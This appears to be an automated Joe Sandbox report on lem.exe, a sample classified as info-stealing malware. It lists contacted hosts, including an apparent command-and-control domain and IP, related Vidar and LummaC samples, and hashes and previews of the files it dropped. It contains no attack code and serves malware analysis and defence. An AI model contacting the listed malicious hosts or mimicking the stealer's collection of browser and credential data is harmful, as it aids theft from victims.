                              http://arpdabl.zapto.orgEGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://steamcommunity.com/profiles/76561199747278259EGift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/76561199747278259[1].htm.11.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgAGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwGift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaGift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              188.245.87.202
                              		unknownIran (ISLAMIC Republic Of)
                              		16322PARSONLINETehran-IRANIRfalse
                              104.102.49.249
                              		steamcommunity.comUnited States
                              		16625AKAMAI-ASUSfalse
                              38.180.132.96
                              		arpdabl.zapto.orgUnited States
                              		174COGENT-174USfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1488222
                              Start date and time:2024-08-05 18:54:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:lem.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@27/66@3/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 89
                              • Number of non-executed functions: 306
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: lem.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:54:56API Interceptor1x Sleep call for process: lem.exe modified
                              12:54:59API Interceptor27x Sleep call for process: Gift.pif modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.102.49.249d3d9.dllGet hashmaliciousLummaCBrowse
                                xLauncher.exeGet hashmaliciousLummaCBrowse
                                  Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                    kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                      vdCC5gzAn6.exeGet hashmaliciousLummaCBrowse
                                        BLXn1MpVdg.exeGet hashmaliciousLummaCBrowse
                                          66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                            66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                              38.180.132.9666af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              66adc1d3f237b_mine.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exeGet hashmaliciousLummaC, VidarBrowse
                                              • arpdabl.zapto.org/
                                              p2StQYQ4ck.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              h3H69FhCbT.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/
                                              file.exeGet hashmaliciousVidarBrowse
                                              • arpdabl.zapto.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              arpdabl.zapto.org66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                              • 38.180.132.96
                                              a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              66adc1d3f237b_mine.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 38.180.132.96
                                              p2StQYQ4ck.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              h3H69FhCbT.exeGet hashmaliciousVidarBrowse
                                              • 38.180.132.96
                                              steamcommunity.comd3d9.dllGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249
                                              xLauncher.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249
                                              Set-Up.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 23.199.218.33
                                              Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 104.102.49.249
                                              Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 23.197.127.21
                                              kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                              • 104.102.49.249
                                              vdCC5gzAn6.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249
                                              BLXn1MpVdg.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              COGENT-174UShttps://grace-barr.filemail.com/t/Fc9Dus5dGet hashmaliciousHTMLPhisherBrowse
                                              • 23.237.152.90
                                              YrZvEGx7oe.exeGet hashmaliciousUnknownBrowse
                                              • 154.7.10.86
                                              toeORRsgUX.exeGet hashmaliciousFormBookBrowse
                                              • 154.23.184.194
                                              Quote - V-24-TOS-082.exeGet hashmaliciousFormBookBrowse
                                              • 38.238.23.229
                                              Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                              • 38.12.1.29
                                              payment copy pdf.exeGet hashmaliciousFormBookBrowse
                                              • 154.41.249.2
                                              Yg4Sqy06Al.exeGet hashmaliciousFormBookBrowse
                                              • 38.47.158.160
                                              http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3DGet hashmaliciousUnknownBrowse
                                              • 38.180.80.71
                                              17nDkQW4tK.elfGet hashmaliciousMiraiBrowse
                                              • 38.148.41.21
                                              MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              PARSONLINETehran-IRANIRmek_n_bat.batGet hashmaliciousUnknownBrowse
                                              • 188.245.88.234
                                              EVnD2SuX13.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 5.78.169.169
                                              docs_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 5.78.41.174
                                              SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 5.78.41.174
                                              purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 5.78.41.174
                                              exe4.bin.bak.exeGet hashmaliciousBlackMoon, GhostRatBrowse
                                              • 5.78.93.88
                                              arm5-20240706-0316.elfGet hashmaliciousMiraiBrowse
                                              • 91.98.88.14
                                              botx.x86.elfGet hashmaliciousMiraiBrowse
                                              • 91.98.39.84
                                              f9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 46.62.234.74
                                              http://www.instegeram.ir/Get hashmaliciousUnknownBrowse
                                              • 31.214.171.171
                                              AKAMAI-ASUSd3d9.dllGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249
                                              xLauncher.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.249
                                              Set-Up.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 23.199.218.33
                                              Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                              • 104.102.49.249
                                              001original.emlGet hashmaliciousUnknownBrowse
                                              • 184.28.90.27
                                              FW Quote.msgGet hashmaliciousHTMLPhisherBrowse
                                              • 184.28.90.27
                                              kMN7AGke8h.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                              • 104.102.49.249
                                              https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.56.162.185

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              51c64c77e60f3980eea90869b68c58a848DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                              • 188.245.87.202
                                              66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                              • 188.245.87.202
                                              66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                              • 188.245.87.202
                                              yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                              • 188.245.87.202
                                              a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exeGet hashmaliciousVidarBrowse
                                              • 188.245.87.202
                                              66adc1d3f237b_mine.exeGet hashmaliciousVidarBrowse
                                              • 188.245.87.202
                                              gZiwLaFWES.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 188.245.87.202
                                              gZiwLaFWES.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 188.245.87.202
                                              c1a96310dd45b906c51fd21fd604550225e1eec1941245850b24773e22768ad7_dump.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 188.245.87.202
                                              setup.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 188.245.87.202
                                              37f463bf4616ecd445d4a1937da06e19Update.jsGet hashmaliciousSocGholishBrowse
                                              • 104.102.49.249
                                              KwUYLIU7Zq.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 104.102.49.249
                                              SecuriteInfo.com.FileRepMalware.22992.301.exeGet hashmaliciousXmrigBrowse
                                              • 104.102.49.249
                                              Yg4Sqy06Al.exeGet hashmaliciousFormBookBrowse
                                              • 104.102.49.249
                                              FACTUR@4#U20e3#U2462#U2463#U2461#U2463#U2461#U2464#U2464.htaGet hashmaliciousUnknownBrowse
                                              • 104.102.49.249
                                              3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                              • 104.102.49.249
                                              CV.vbsGet hashmaliciousXmrigBrowse
                                              • 104.102.49.249
                                              Viz_Setup.U3.11.exeGet hashmaliciousUnknownBrowse
                                              • 104.102.49.249

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\CBKJJJDHDGDA\GDAAKKljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                                jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                  5CG2133F5Y_2024-04-05_12_15_35.569.zipGet hashmaliciousUnknownBrowse
                                                    C:\ProgramData\freebl3.dllHq2NRFbvRb.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                      sorto.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                        66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                                                          66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                                                            01Y61PeNtn.exeGet hashmaliciousStealc, VidarBrowse
                                                              8lGYdT47s1.exeGet hashmaliciousStealc, VidarBrowse
                                                                jp95FFMUoh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                                    a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exeGet hashmaliciousVidarBrowse
                                                                      66adc1d3f237b_mine.exeGet hashmaliciousVidarBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\CBKJJJDHDGDA\AAKEGI

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2947
                                                                        Entropy (8bit):5.120077314818075
                                                                        Encrypted:false
                                                                        SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                        MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                        SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                        SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                        SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                        C:\ProgramData\CBKJJJDHDGDA\AAKKEC

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\AFCBKF

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.8439810553697228
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\AFHDGD

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):9504
                                                                        Entropy (8bit):5.512408163813622
                                                                        Encrypted:false
                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                        Malicious:false
                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                        C:\ProgramData\CBKJJJDHDGDA\BAEBGH

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1941
                                                                        Entropy (8bit):4.861537145678193
                                                                        Encrypted:false
                                                                        SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                        MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                        SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                        SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                        SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

                                                                        C:\ProgramData\CBKJJJDHDGDA\BAKJKF

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4533
                                                                        Entropy (8bit):5.1021772201912805
                                                                        Encrypted:false
                                                                        SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                        MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                        SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                        SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                        SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                        C:\ProgramData\CBKJJJDHDGDA\BFBKFH

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1065
                                                                        Entropy (8bit):4.96984082363901
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                        MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                        SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                        SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                        SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                        C:\ProgramData\CBKJJJDHDGDA\BFHIJE

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8193
                                                                        Entropy (8bit):5.027484893998515
                                                                        Encrypted:false
                                                                        SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                        MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                        SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                        SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                        SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

                                                                        C:\ProgramData\CBKJJJDHDGDA\CFCFHJ

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):4814
                                                                        Entropy (8bit):7.909739359753065
                                                                        Encrypted:false
                                                                        SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                        MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                        SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                        SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
